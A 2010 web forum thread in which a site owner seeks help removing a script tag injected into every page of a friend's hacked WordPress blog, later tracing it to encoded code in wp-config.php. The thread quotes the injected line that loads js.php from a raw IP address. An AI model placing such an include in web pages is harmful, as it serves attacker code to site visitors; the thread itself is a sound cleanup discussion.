jsarber Posted April 23, 2010 Report Posted April 23, 2010 My friend, The Lonely Conservative (lonelyconservative.com), had her site hacked. I am struggling to find the problem code within her Wordpress site. Here's what going on. This script has been added to the bottom of each page: <script src="http://61.4.82.212/js.php"></script> As you would expect, this script is not within the actual files. I assume I am looking for some kind of encoded something or other. How in the world do I go about finding it? I've been searching for more than a day. Quote
falkencreative Posted April 23, 2010 Report Posted April 23, 2010 Just double checking... you've checked the bottom of your index.php file? (in the root of your site -- not within your theme folder) And the footer.php file within your theme folder? It looks like it's included on every page, so those are the two logical places it would be. It won't necessarily be encoded -- this has happened to me in the past and it was just plain text. Quote
krillz Posted April 23, 2010 Report Posted April 23, 2010 sounds like a XSS attack, start by looking at user submited data. Quote
jsarber Posted April 23, 2010 Author Report Posted April 23, 2010 Here's the root index file: <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define('WP_USE_THEMES', true); /** Loads the WordPress Environment and Template */ require('./wp-blog-header.php'); ?> Here's the theme's footer: <?php global $wp_theme_options; ?> <?php do_action('above_footer') ?> </div><!--end #container--> <div class="<?php do_action('container_style'); ?>" id="footer"> <div class="alignleft"> <strong><?php bloginfo('name'); ?></strong><br /> <?php _e('Copyright ©','flexx'); echo ' '.date('Y').' '; _e('All Rights Reserved','flexx'); ?> </div> <div class="alignright"> <?php $footer_credit = '<a href="http://flexxtheme.com/" title="Flexx Theme">'.__('Flexx Theme','flexx').'</a> '.__('by','flexx').' <a href="http://ithemes.com" title="WordPress Themes">iThemes</a><br />'; $footer_credit .= __('Powered by','flexx').' <a href="http://wordpress.org">'.__('WordPress','flexx').'</a>'; echo apply_filters('ithemes_footer_credit',$footer_credit); ?> </div> <?php wp_footer(); //We need this for plugins ?> </div> <?php do_action('flexx_footer_stats'); ?> </body> </html> I don't see anything, do you? I've searched the entire site for that script and every part of it. My search was fruitless which made me think it must be encoded. I also searched the database and came up short. I don't know what to do. Quote
jsarber Posted April 23, 2010 Author Report Posted April 23, 2010 I got it. It was some encoded script added to the wp-config file in the root directory by some hacker. I simply replaced the file, changed the passwords, and all is well. Quote
falkencreative Posted April 23, 2010 Report Posted April 23, 2010 Cool, glad you got that fixed. Quote
newseed Posted April 23, 2010 Report Posted April 23, 2010 For security measure, be sure to set your wp-config.php file to be unwritable via your hosting control panel. Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.